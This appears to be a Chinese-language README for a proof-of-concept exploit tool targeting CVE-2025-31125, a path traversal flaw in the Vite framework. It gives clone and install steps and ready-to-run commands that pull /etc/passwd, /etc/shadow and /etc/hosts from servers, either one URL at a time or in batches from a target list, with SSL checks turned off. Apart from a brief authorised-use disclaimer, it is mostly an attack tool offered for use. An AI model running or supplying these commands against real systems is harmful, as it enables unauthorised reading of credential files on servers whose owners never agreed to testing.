此脚本是针对 CVE-2025-31125(Vite 中发现的一个漏洞)的 概念验证 (PoC) 利用程序。该漏洞利用 WASM 导入路径遍历 问题,从运行 Vite 框架的易受攻击服务器中检索敏感文件。它允许攻击者访问诸如 /etc/passwd、/etc/shadow、/etc/hosts 以及服务器暴露的其他敏感文件。 ⚠️
此工具仅供教育目的,且仅应在您拥有或已获得明确测试许可的系统上使用。未经授权访问系统是违法的,可能导致法律后果。请负责任地使用此工具! ⚖️
/etc/passwd、/etc/shadow 等! 💻requests 库 📦urllib3 库 🔒toilet(可选,用于横幅) 🎨pip3 install -r requirements.txt
要在系统上安装 toilet(可选,用于横幅):
sudo apt install toiletbrew install toiletgit clone https://github.com/0xgh057r3c0n/CVE-2025-31125.git
cd CVE-2025-31125
pip3 install -r requirements.txt
要使用该脚本,请通过 -u 提供单个目标 URL,或通过 -f 提供包含多个目标 URL 的文件。
-u, --url: 针对单个 URL。 🌐-f, --file: 提供一个包含目标 URL 列表的文件(每行一个)。 📄--path: 指定要利用的路径(例如 /etc/passwd、/etc/shadow)。默认为 /etc/passwd。 🛠️--no-verify: 禁用 SSL 验证(对自签名证书有用)。 🔒/etc/passwd)python3 exploit.py -u https://example.com --no-verify
/etc/shadow)python3 exploit.py -u https://example.com --no-verify --path /etc/shadow
/etc/passwd)python3 exploit.py -f targets.txt --no-verify
/etc/hosts)python3 exploit.py -f targets.txt --no-verify --path /etc/hosts
🙋♂️ 联系方式(用于合作、研究与网络安全讨论):
本项目基于 MIT 许可证 授权。 🌟
